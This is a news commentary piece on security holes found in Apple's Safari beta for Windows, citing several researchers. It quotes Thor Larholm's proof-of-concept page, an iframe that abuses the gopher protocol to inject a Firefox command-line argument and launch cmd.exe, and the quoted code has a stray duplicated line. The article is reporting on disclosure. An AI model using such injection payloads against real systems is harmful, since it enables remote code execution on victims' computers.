Rixstep
 About | ACP | Buy | Industry Watch | Learning Curve | News | Search | Test
Home » Industry Watch

Holy Safari!

Apple's ultra secure web browser now ported to Windows perforated repeatedly within hours of release.


Get It

Try It

It's déjà vu all over again: as with the first ever release of Safari for OS X which hosed people's hard drives the first ever release for Windows is getting bad press because of a whole slew of endemic security vulnerabilities.

Aviv Raff, David Maynor, and Thor Larholm are all reporting serious security flaws in the browser.

'Given that Apple has had a lousy track record with security on OS X, in addition to a hostile attitude towards security researchers, a lot of people are expecting to see quite a number of vulnerabilities targeted towards this new Windows browser', writes Larholm on his blog and then goes on to explain the workings of a zero day he found in only two hours poking around.

What Larholm found was an endemic bug: no fuzzing for once. He has a test page up which may be accessed here - but you're advised to not go there unless you like that kind of fun. Instead you can read the page code below.

<html><body>
<iframe src='gopher://larholm.com" -chrome
"javascript:C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)
+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'
+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);process.run(true,{},0);alert(process)'></iframe>
process.init(file);process.run(true,{},0);alert(process)
</body></html>

The exploit works by bouncing from Safari through Firefox with the 'gopher' protocol, passing on unfiltered input for the -chrome argument and then launching C:\Windows\System32\cmd.exe - the NT command interpeter - with any arguments you choose to specify in the process.run method.

The bread's burning.

Aviv Raff is also out with an exploit. 'I've decided to take it for a test drive, and ran Hamachi. I wasn't surprised to get a nice crash few minutes later', writes Raff who doesn't think much of Apple's claims of their software being secure.

'This is just a beta version but don't you hate those pathetic claims?

Finally David Maynor's out with his fuzz saw, finding first a 'memory corruption', then a 'stack corruption', and later an additional four 'bugs'.

'These are popping out like hotcakes', writes Maynor.

About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Copyright © Rixstep. All rights reserved.